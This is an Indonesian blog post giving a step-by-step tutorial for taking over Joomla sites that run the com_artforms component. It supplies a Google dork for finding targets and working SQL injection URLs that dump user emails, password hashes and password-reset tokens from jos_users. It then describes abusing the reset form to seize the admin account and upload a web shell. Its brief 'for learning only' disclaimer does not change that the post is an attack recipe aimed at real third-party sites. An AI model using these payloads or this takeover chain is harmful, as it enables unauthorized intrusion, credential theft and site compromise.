Tips dan Trik

[tips and trick][bsummary]

Hiburan

[hiburan][twocolumns]

Exploit Joomla Dengan Token dan Reset Password

Assalamualaikum wr-wb , ketemu lagi bersama saya sang lelaki ganteng :v wkwkw becanda ! dalam tutorial exploit joomla dengan token dan reset password , di jelaskan bagaimana cara exploit web joomla , tanpa crack hash nya melainkan dengan akses token dan reset pass , langsung saja
sediakan web yang vuln, agan bisa mencari dengan DORK , atau agan bisa scan dengan UNISCAN ,

dalam contoh ini ane menggunakan dork

inurl:"option com_artforms"


ane anggap agan sudah mendapatkan target ,

http://www.site.com/index.php?option=com_artforms&Itemid=73

lalu agan tambahin

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,us
ername,0x3a,password)+from+jos_users--

pada web joomla tersebut , sehingga muncul

ok , tahap ini berhasil ! berarti web tersebut vuln dan kita akan masuk ke tahap berikutnya .
selanjutnya adalah tahap reset password rubah sehingga menjadi

http://www.site.com/index.php?option=com_user&view=reset
dan muncul seperti gambar di bawah ! dan agan masukan email website tersebut


setelah itu muncul form token seperti gambar di bawah

nah , dari mana token bisa kita ketahui ? token akan tersimpan di data base , dan kita bisa melihatna dengan memasukan kode ini pada url website tersebut

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a
,activation)+from+jos_users

setelah itu akan muncul form reset pass baru , tapi kadang cara ini ngak bisa , kalau agan mendapatkan token dengan tanda :$ sekian2 agan tidak bisa mereset pass nya , cari ajah yg lain ;)
nah kemudian kita masuk deh di admin loginnya , biasa nya site.com/administrator dan

upload shell agan deh ;) atau file upload tersembunyi . sekian dari ane , mohon kritik dan sarannya ;)
saran ane , jangan ngerusak web orang lain ! ngak baik n dosa , hanya buat pembelajaran ;)

Penulis bernama lengkap Aris Sando Hamzah, S.Pi lahir di Ambon pada tahun 1994. Saat ini penulis berdomisili di Kota Kendari, Provinsi Sulawesi Tenggara Indonesia.

No comments:

Post a Comment

komputer

[komputer][bigposts]

Ispiratif

[inspirasi][bsummary]

IT

[IT][twocolumns]